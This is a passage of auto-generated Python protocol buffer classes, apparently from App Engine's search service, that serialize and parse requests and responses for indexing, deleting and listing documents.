1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.NUMERIC,
3: ProtocolBuffer.Encoder.STRING,
}, 3, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.IndexDocumentParams'
class IndexDocumentRequest(ProtocolBuffer.ProtocolMessage):
has_params_ = 0
has_app_id_ = 0
app_id_ = ""
def __init__(self, contents=None):
self.params_ = IndexDocumentParams()
if contents is not None: self.MergeFromString(contents)
def params(self): return self.params_
def mutable_params(self): self.has_params_ = 1; return self.params_
def clear_params(self):self.has_params_ = 0; self.params_.Clear()
def has_params(self): return self.has_params_
def app_id(self): return self.app_id_
def set_app_id(self, x):
self.has_app_id_ = 1
self.app_id_ = x
def clear_app_id(self):
if self.has_app_id_:
self.has_app_id_ = 0
self.app_id_ = ""
def has_app_id(self): return self.has_app_id_
def MergeFrom(self, x):
assert x is not self
if (x.has_params()): self.mutable_params().MergeFrom(x.params())
if (x.has_app_id()): self.set_app_id(x.app_id())
def Equals(self, x):
if x is self: return 1
if self.has_params_ != x.has_params_: return 0
if self.has_params_ and self.params_ != x.params_: return 0
if self.has_app_id_ != x.has_app_id_: return 0
if self.has_app_id_ and self.app_id_ != x.app_id_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_params_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: params not set.')
elif not self.params_.IsInitialized(debug_strs): initialized = 0
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(self.params_.ByteSize())
if (self.has_app_id_): n += 1 + self.lengthString(len(self.app_id_))
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_params_):
n += 1
n += self.lengthString(self.params_.ByteSizePartial())
if (self.has_app_id_): n += 1 + self.lengthString(len(self.app_id_))
return n
def Clear(self):
self.clear_params()
self.clear_app_id()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putVarInt32(self.params_.ByteSize())
self.params_.OutputUnchecked(out)
if (self.has_app_id_):
out.putVarInt32(26)
out.putPrefixedString(self.app_id_)
def OutputPartial(self, out):
if (self.has_params_):
out.putVarInt32(10)
out.putVarInt32(self.params_.ByteSizePartial())
self.params_.OutputPartial(out)
if (self.has_app_id_):
out.putVarInt32(26)
out.putPrefixedString(self.app_id_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_params().TryMerge(tmp)
continue
if tt == 26:
self.set_app_id(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_params_:
res+=prefix+"params <\n"
res+=self.params_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
if self.has_app_id_: res+=prefix+("app_id: %s\n" % self.DebugFormatString(self.app_id_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kparams = 1
kapp_id = 3
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "params",
3: "app_id",
}, 3)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
3: ProtocolBuffer.Encoder.STRING,
}, 3, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.IndexDocumentRequest'
class IndexDocumentResponse(ProtocolBuffer.ProtocolMessage):
def __init__(self, contents=None):
self.status_ = []
self.doc_id_ = []
if contents is not None: self.MergeFromString(contents)
def status_size(self): return len(self.status_)
def status_list(self): return self.status_
def status(self, i):
return self.status_[i]
def mutable_status(self, i):
return self.status_[i]
def add_status(self):
x = RequestStatus()
self.status_.append(x)
return x
def clear_status(self):
self.status_ = []
def doc_id_size(self): return len(self.doc_id_)
def doc_id_list(self): return self.doc_id_
def doc_id(self, i):
return self.doc_id_[i]
def set_doc_id(self, i, x):
self.doc_id_[i] = x
def add_doc_id(self, x):
self.doc_id_.append(x)
def clear_doc_id(self):
self.doc_id_ = []
def MergeFrom(self, x):
assert x is not self
for i in xrange(x.status_size()): self.add_status().CopyFrom(x.status(i))
for i in xrange(x.doc_id_size()): self.add_doc_id(x.doc_id(i))
def Equals(self, x):
if x is self: return 1
if len(self.status_) != len(x.status_): return 0
for e1, e2 in zip(self.status_, x.status_):
if e1 != e2: return 0
if len(self.doc_id_) != len(x.doc_id_): return 0
for e1, e2 in zip(self.doc_id_, x.doc_id_):
if e1 != e2: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
for p in self.status_:
if not p.IsInitialized(debug_strs): initialized=0
return initialized
def ByteSize(self):
n = 0
n += 1 * len(self.status_)
for i in xrange(len(self.status_)): n += self.lengthString(self.status_[i].ByteSize())
n += 1 * len(self.doc_id_)
for i in xrange(len(self.doc_id_)): n += self.lengthString(len(self.doc_id_[i]))
return n
def ByteSizePartial(self):
n = 0
n += 1 * len(self.status_)
for i in xrange(len(self.status_)): n += self.lengthString(self.status_[i].ByteSizePartial())
n += 1 * len(self.doc_id_)
for i in xrange(len(self.doc_id_)): n += self.lengthString(len(self.doc_id_[i]))
return n
def Clear(self):
self.clear_status()
self.clear_doc_id()
def OutputUnchecked(self, out):
for i in xrange(len(self.status_)):
out.putVarInt32(10)
out.putVarInt32(self.status_[i].ByteSize())
self.status_[i].OutputUnchecked(out)
for i in xrange(len(self.doc_id_)):
out.putVarInt32(18)
out.putPrefixedString(self.doc_id_[i])
def OutputPartial(self, out):
for i in xrange(len(self.status_)):
out.putVarInt32(10)
out.putVarInt32(self.status_[i].ByteSizePartial())
self.status_[i].OutputPartial(out)
for i in xrange(len(self.doc_id_)):
out.putVarInt32(18)
out.putPrefixedString(self.doc_id_[i])
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.add_status().TryMerge(tmp)
continue
if tt == 18:
self.add_doc_id(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
cnt=0
for e in self.status_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("status%s <\n" % elm)
res+=e.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
cnt+=1
cnt=0
for e in self.doc_id_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("doc_id%s: %s\n" % (elm, self.DebugFormatString(e)))
cnt+=1
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kstatus = 1
kdoc_id = 2
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "status",
2: "doc_id",
}, 2)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STRING,
}, 2, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.IndexDocumentResponse'
class DeleteDocumentParams(ProtocolBuffer.ProtocolMessage):
has_index_spec_ = 0
def __init__(self, contents=None):
self.doc_id_ = []
self.index_spec_ = IndexSpec()
if contents is not None: self.MergeFromString(contents)
def doc_id_size(self): return len(self.doc_id_)
def doc_id_list(self): return self.doc_id_
def doc_id(self, i):
return self.doc_id_[i]
def set_doc_id(self, i, x):
self.doc_id_[i] = x
def add_doc_id(self, x):
self.doc_id_.append(x)
def clear_doc_id(self):
self.doc_id_ = []
def index_spec(self): return self.index_spec_
def mutable_index_spec(self): self.has_index_spec_ = 1; return self.index_spec_
def clear_index_spec(self):self.has_index_spec_ = 0; self.index_spec_.Clear()
def has_index_spec(self): return self.has_index_spec_
def MergeFrom(self, x):
assert x is not self
for i in xrange(x.doc_id_size()): self.add_doc_id(x.doc_id(i))
if (x.has_index_spec()): self.mutable_index_spec().MergeFrom(x.index_spec())
def Equals(self, x):
if x is self: return 1
if len(self.doc_id_) != len(x.doc_id_): return 0
for e1, e2 in zip(self.doc_id_, x.doc_id_):
if e1 != e2: return 0
if self.has_index_spec_ != x.has_index_spec_: return 0
if self.has_index_spec_ and self.index_spec_ != x.index_spec_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_index_spec_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: index_spec not set.')
elif not self.index_spec_.IsInitialized(debug_strs): initialized = 0
return initialized
def ByteSize(self):
n = 0
n += 1 * len(self.doc_id_)
for i in xrange(len(self.doc_id_)): n += self.lengthString(len(self.doc_id_[i]))
n += self.lengthString(self.index_spec_.ByteSize())
return n + 1
def ByteSizePartial(self):
n = 0
n += 1 * len(self.doc_id_)
for i in xrange(len(self.doc_id_)): n += self.lengthString(len(self.doc_id_[i]))
if (self.has_index_spec_):
n += 1
n += self.lengthString(self.index_spec_.ByteSizePartial())
return n
def Clear(self):
self.clear_doc_id()
self.clear_index_spec()
def OutputUnchecked(self, out):
for i in xrange(len(self.doc_id_)):
out.putVarInt32(10)
out.putPrefixedString(self.doc_id_[i])
out.putVarInt32(18)
out.putVarInt32(self.index_spec_.ByteSize())
self.index_spec_.OutputUnchecked(out)
def OutputPartial(self, out):
for i in xrange(len(self.doc_id_)):
out.putVarInt32(10)
out.putPrefixedString(self.doc_id_[i])
if (self.has_index_spec_):
out.putVarInt32(18)
out.putVarInt32(self.index_spec_.ByteSizePartial())
self.index_spec_.OutputPartial(out)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.add_doc_id(d.getPrefixedString())
continue
if tt == 18:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_index_spec().TryMerge(tmp)
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
cnt=0
for e in self.doc_id_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("doc_id%s: %s\n" % (elm, self.DebugFormatString(e)))
cnt+=1
if self.has_index_spec_:
res+=prefix+"index_spec <\n"
res+=self.index_spec_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kdoc_id = 1
kindex_spec = 2
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "doc_id",
2: "index_spec",
}, 2)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STRING,
}, 2, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.DeleteDocumentParams'
class DeleteDocumentRequest(ProtocolBuffer.ProtocolMessage):
has_params_ = 0
has_app_id_ = 0
app_id_ = ""
def __init__(self, contents=None):
self.params_ = DeleteDocumentParams()
if contents is not None: self.MergeFromString(contents)
def params(self): return self.params_
def mutable_params(self): self.has_params_ = 1; return self.params_
def clear_params(self):self.has_params_ = 0; self.params_.Clear()
def has_params(self): return self.has_params_
def app_id(self): return self.app_id_
def set_app_id(self, x):
self.has_app_id_ = 1
self.app_id_ = x
def clear_app_id(self):
if self.has_app_id_:
self.has_app_id_ = 0
self.app_id_ = ""
def has_app_id(self): return self.has_app_id_
def MergeFrom(self, x):
assert x is not self
if (x.has_params()): self.mutable_params().MergeFrom(x.params())
if (x.has_app_id()): self.set_app_id(x.app_id())
def Equals(self, x):
if x is self: return 1
if self.has_params_ != x.has_params_: return 0
if self.has_params_ and self.params_ != x.params_: return 0
if self.has_app_id_ != x.has_app_id_: return 0
if self.has_app_id_ and self.app_id_ != x.app_id_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_params_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: params not set.')
elif not self.params_.IsInitialized(debug_strs): initialized = 0
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(self.params_.ByteSize())
if (self.has_app_id_): n += 1 + self.lengthString(len(self.app_id_))
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_params_):
n += 1
n += self.lengthString(self.params_.ByteSizePartial())
if (self.has_app_id_): n += 1 + self.lengthString(len(self.app_id_))
return n
def Clear(self):
self.clear_params()
self.clear_app_id()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putVarInt32(self.params_.ByteSize())
self.params_.OutputUnchecked(out)
if (self.has_app_id_):
out.putVarInt32(26)
out.putPrefixedString(self.app_id_)
def OutputPartial(self, out):
if (self.has_params_):
out.putVarInt32(10)
out.putVarInt32(self.params_.ByteSizePartial())
self.params_.OutputPartial(out)
if (self.has_app_id_):
out.putVarInt32(26)
out.putPrefixedString(self.app_id_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_params().TryMerge(tmp)
continue
if tt == 26:
self.set_app_id(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_params_:
res+=prefix+"params <\n"
res+=self.params_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
if self.has_app_id_: res+=prefix+("app_id: %s\n" % self.DebugFormatString(self.app_id_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kparams = 1
kapp_id = 3
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "params",
3: "app_id",
}, 3)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
3: ProtocolBuffer.Encoder.STRING,
}, 3, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.DeleteDocumentRequest'
class DeleteDocumentResponse(ProtocolBuffer.ProtocolMessage):
def __init__(self, contents=None):
self.status_ = []
if contents is not None: self.MergeFromString(contents)
def status_size(self): return len(self.status_)
def status_list(self): return self.status_
def status(self, i):
return self.status_[i]
def mutable_status(self, i):
return self.status_[i]
def add_status(self):
x = RequestStatus()
self.status_.append(x)
return x
def clear_status(self):
self.status_ = []
def MergeFrom(self, x):
assert x is not self
for i in xrange(x.status_size()): self.add_status().CopyFrom(x.status(i))
def Equals(self, x):
if x is self: return 1
if len(self.status_) != len(x.status_): return 0
for e1, e2 in zip(self.status_, x.status_):
if e1 != e2: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
for p in self.status_:
if not p.IsInitialized(debug_strs): initialized=0
return initialized
def ByteSize(self):
n = 0
n += 1 * len(self.status_)
for i in xrange(len(self.status_)): n += self.lengthString(self.status_[i].ByteSize())
return n
def ByteSizePartial(self):
n = 0
n += 1 * len(self.status_)
for i in xrange(len(self.status_)): n += self.lengthString(self.status_[i].ByteSizePartial())
return n
def Clear(self):
self.clear_status()
def OutputUnchecked(self, out):
for i in xrange(len(self.status_)):
out.putVarInt32(10)
out.putVarInt32(self.status_[i].ByteSize())
self.status_[i].OutputUnchecked(out)
def OutputPartial(self, out):
for i in xrange(len(self.status_)):
out.putVarInt32(10)
out.putVarInt32(self.status_[i].ByteSizePartial())
self.status_[i].OutputPartial(out)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.add_status().TryMerge(tmp)
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
cnt=0
for e in self.status_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("status%s <\n" % elm)
res+=e.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
cnt+=1
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kstatus = 1
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "status",
}, 1)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
}, 1, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.DeleteDocumentResponse'
class ListDocumentsParams(ProtocolBuffer.ProtocolMessage):
has_index_spec_ = 0
has_start_doc_id_ = 0
start_doc_id_ = ""
has_include_start_doc_ = 0
include_start_doc_ = 1
has_limit_ = 0
limit_ = 100
has_keys_only_ = 0
keys_only_ = 0
def __init__(self, contents=None):
self.index_spec_ = IndexSpec()
if contents is not None: self.MergeFromString(contents)
def index_spec(self): return self.index_spec_
def mutable_index_spec(self): self.has_index_spec_ = 1; return self.index_spec_
def clear_index_spec(self):self.has_index_spec_ = 0; self.index_spec_.Clear()
def has_index_spec(self): return self.has_index_spec_
def start_doc_id(self): return self.start_doc_id_
def set_start_doc_id(self, x):
self.has_start_doc_id_ = 1
self.start_doc_id_ = x
def clear_start_doc_id(self):
if self.has_start_doc_id_:
self.has_start_doc_id_ = 0
self.start_doc_id_ = ""
def has_start_doc_id(self): return self.has_start_doc_id_
def include_start_doc(self): return self.include_start_doc_
def set_include_start_doc(self, x):
self.has_include_start_doc_ = 1
self.include_start_doc_ = x
def clear_include_start_doc(self):
if self.has_include_start_doc_:
self.has_include_start_doc_ = 0
self.include_start_doc_ = 1
def has_include_start_doc(self): return self.has_include_start_doc_
def limit(self): return self.limit_
def set_limit(self, x):
self.has_limit_ = 1
self.limit_ = x
def clear_limit(self):
if self.has_limit_:
self.has_limit_ = 0
self.limit_ = 100
def has_limit(self): return self.has_limit_
def keys_only(self): return self.keys_only_
def set_keys_only(self, x):
self.has_keys_only_ = 1
self.keys_only_ = x
def clear_keys_only(self):
if self.has_keys_only_:
self.has_keys_only_ = 0
self.keys_only_ = 0
def has_keys_only(self): return self.has_keys_only_
def MergeFrom(self, x):
assert x is not self
if (x.has_index_spec()): self.mutable_index_spec().MergeFrom(x.index_spec())
if (x.has_start_doc_id()): self.set_start_doc_id(x.start_doc_id())
if (x.has_include_start_doc()): self.set_include_start_doc(x.include_start_doc())
if (x.has_limit()): self.set_limit(x.limit())
if (x.has_keys_only()): self.set_keys_only(x.keys_only())
def Equals(self, x):
if x is self: return 1
if self.has_index_spec_ != x.has_index_spec_: return 0
if self.has_index_spec_ and self.index_spec_ != x.index_spec_: return 0
if self.has_start_doc_id_ != x.has_start_doc_id_: return 0
if self.has_start_doc_id_ and self.start_doc_id_ != x.start_doc_id_: return 0
if self.has_include_start_doc_ != x.has_include_start_doc_: return 0
if self.has_include_start_doc_ and self.include_start_doc_ != x.include_start_doc_: return 0
if self.has_limit_ != x.has_limit_: return 0
if self.has_limit_ and self.limit_ != x.limit_: return 0
if self.has_keys_only_ != x.has_keys_only_: return 0
if self.has_keys_only_ and self.keys_only_ != x.keys_only_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_index_spec_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: index_spec not set.')
elif not self.index_spec_.IsInitialized(debug_strs): initialized = 0
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(self.index_spec_.ByteSize())
if (self.has_start_doc_id_): n += 1 + self.lengthString(len(self.start_doc_id_))
if (self.has_include_start_doc_): n += 2
if (self.has_limit_): n += 1 + self.lengthVarInt64(self.limit_)
if (self.has_keys_only_): n += 2
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_index_spec_):
n += 1
n += self.lengthString(self.index_spec_.ByteSizePartial())
if (self.has_start_doc_id_): n += 1 + self.lengthString(len(self.start_doc_id_))
if (self.has_include_start_doc_): n += 2
if (self.has_limit_): n += 1 + self.lengthVarInt64(self.limit_)
if (self.has_keys_only_): n += 2
return n
def Clear(self):
self.clear_index_spec()
self.clear_start_doc_id()
self.clear_include_start_doc()
self.clear_limit()
self.clear_keys_only()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putVarInt32(self.index_spec_.ByteSize())
self.index_spec_.OutputUnchecked(out)
if (self.has_start_doc_id_):
out.putVarInt32(18)
out.putPrefixedString(self.start_doc_id_)
if (self.has_include_start_doc_):
out.putVarInt32(24)
out.putBoolean(self.include_start_doc_)
if (self.has_limit_):
out.putVarInt32(32)
out.putVarInt32(self.limit_)
if (self.has_keys_only_):
out.putVarInt32(40)
out.putBoolean(self.keys_only_)
def OutputPartial(self, out):
if (self.has_index_spec_):
out.putVarInt32(10)
out.putVarInt32(self.index_spec_.ByteSizePartial())
self.index_spec_.OutputPartial(out)
if (self.has_start_doc_id_):
out.putVarInt32(18)
out.putPrefixedString(self.start_doc_id_)
if (self.has_include_start_doc_):
out.putVarInt32(24)
out.putBoolean(self.include_start_doc_)
if (self.has_limit_):
out.putVarInt32(32)
out.putVarInt32(self.limit_)
if (self.has_keys_only_):
out.putVarInt32(40)
out.putBoolean(self.keys_only_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_index_spec().TryMerge(tmp)
continue
if tt == 18:
self.set_start_doc_id(d.getPrefixedString())
continue
if tt == 24:
self.set_include_start_doc(d.getBoolean())
continue
if tt == 32:
self.set_limit(d.getVarInt32())
continue
if tt == 40:
self.set_keys_only(d.getBoolean())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_index_spec_:
res+=prefix+"index_spec <\n"
res+=self.index_spec_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
if self.has_start_doc_id_: res+=prefix+("start_doc_id: %s\n" % self.DebugFormatString(self.start_doc_id_))
if self.has_include_start_doc_: res+=prefix+("include_start_doc: %s\n" % self.DebugFormatBool(self.include_start_doc_))
if self.has_limit_: res+=prefix+("limit: %s\n" % self.DebugFormatInt32(self.limit_))
if self.has_keys_only_: res+=prefix+("keys_only: %s\n" % self.DebugFormatBool(self.keys_only_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kindex_spec = 1
kstart_doc_id = 2
kinclude_start_doc = 3
klimit = 4
kkeys_only = 5
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "index_spec",
2: "start_doc_id",
3: "include_start_doc",
4: "limit",
5: "keys_only",
}, 5)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STRING,
3: ProtocolBuffer.Encoder.NUMERIC,
4: ProtocolBuffer.Encoder.NUMERIC,
5: ProtocolBuffer.Encoder.NUMERIC,
}, 5, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.ListDocumentsParams'
class ListDocumentsRequest(ProtocolBuffer.ProtocolMessage):
has_params_ = 0
has_app_id_ = 0
app_id_ = ""
def __init__(self, contents=None):
self.params_ = ListDocumentsParams()
if contents is not None: self.MergeFromString(contents)
def params(self): return self.params_
def mutable_params(self): self.has_params_ = 1; return self.params_
def clear_params(self):self.has_params_ = 0; self.params_.Clear()
def has_params(self): return self.has_params_
def app_id(self): return self.app_id_
def set_app_id(self, x):
self.has_app_id_ = 1
self.app_id_ = x
def clear_app_id(self):
if self.has_app_id_:
self.has_app_id_ = 0
self.app_id_ = ""
def has_app_id(self): return self.has_app_id_
def MergeFrom(self, x):
assert x is not self
if (x.has_params()): self.mutable_params().MergeFrom(x.params())
if (x.has_app_id()): self.set_app_id(x.app_id())
def Equals(self, x):
if x is self: return 1
if self.has_params_ != x.has_params_: return 0
if self.has_params_ and self.params_ != x.params_: return 0
if self.has_app_id_ != x.has_app_id_: return 0
if self.has_app_id_ and self.app_id_ != x.app_id_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_params_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: params not set.')
elif not self.params_.IsInitialized(debug_strs): initialized = 0
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(self.params_.ByteSize())
if (self.has_app_id_): n += 1 + self.lengthString(len(self.app_id_))
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_params_):
n += 1
n += self.lengthString(self.params_.ByteSizePartial())
if (self.has_app_id_): n += 1 + self.lengthString(len(self.app_id_))
return n
def Clear(self):
self.clear_params()
self.clear_app_id()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putVarInt32(self.params_.ByteSize())
self.params_.OutputUnchecked(out)
if (self.has_app_id_):
out.putVarInt32(18)
out.putPrefixedString(self.app_id_)
def OutputPartial(self, out):
if (self.has_params_):
out.putVarInt32(10)
out.putVarInt32(self.params_.ByteSizePartial())
self.params_.OutputPartial(out)
if (self.has_app_id_):
out.putVarInt32(18)
out.putPrefixedString(self.app_id_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_params().TryMerge(tmp)
continue
if tt == 18:
self.set_app_id(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_params_:
res+=prefix+"params <\n"
res+=self.params_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
if self.has_app_id_: res+=prefix+("app_id: %s\n" % self.DebugFormatString(self.app_id_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kparams = 1
kapp_id = 2
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "params",
2: "app_id",
}, 2)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STRING,
}, 2, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.ListDocumentsRequest'
class ListDocumentsResponse(ProtocolBuffer.ProtocolMessage):
has_status_ = 0
def __init__(self, contents=None):
self.status_ = RequestStatus()
self.document_ = []
if contents is not None: self.MergeFromString(contents)
def status(self): return self.status_
def mutable_status(self): self.has_status_ = 1; return self.status_
def clear_status(self):self.has_status_ = 0; self.status_.Clear()
def has_status(self): return self.has_status_
def document_size(self): return len(self.document_)
def document_list(self): return self.document_
def document(self, i):
return self.document_[i]
def mutable_document(self, i):
return self.document_[i]
def add_document(self):
x = Document()
self.document_.append(x)
return x
def clear_document(self):
self.document_ = []
def MergeFrom(self, x):
assert x is not self
if (x.has_status()): self.mutable_status().MergeFrom(x.status())
for i in xrange(x.document_size()): self.add_document().CopyFrom(x.document(i))
def Equals(self, x):
if x is self: return 1
if self.has_status_ != x.has_status_: return 0
if self.has_status_ and self.status_ != x.status_: return 0
if len(self.document_) != len(x.document_): return 0
for e1, e2 in zip(self.document_, x.document_):
if e1 != e2: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_status_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: status not set.')
elif not self.status_.IsInitialized(debug_strs): initialized = 0
for p in self.document_:
if not p.IsInitialized(debug_strs): initialized=0
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(self.status_.ByteSize())
n += 1 * len(self.document_)
for i in xrange(len(self.document_)): n += self.lengthString(self.document_[i].ByteSize())
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_status_):
n += 1
n += self.lengthString(self.status_.ByteSizePartial())
n += 1 * len(self.document_)
for i in xrange(len(self.document_)): n += self.lengthString(self.document_[i].ByteSizePartial())
return n
def Clear(self):
self.clear_status()
self.clear_document()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putVarInt32(self.status_.ByteSize())
self.status_.OutputUnchecked(out)
for i in xrange(len(self.document_)):
out.putVarInt32(18)
out.putVarInt32(self.document_[i].ByteSize())
self.document_[i].OutputUnchecked(out)
def OutputPartial(self, out):
if (self.has_status_):
out.putVarInt32(10)
out.putVarInt32(self.status_.ByteSizePartial())
self.status_.OutputPartial(out)
for i in xrange(len(self.document_)):
out.putVarInt32(18)
out.putVarInt32(self.document_[i].ByteSizePartial())
self.document_[i].OutputPartial(out)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
length = d.getVarInt32()
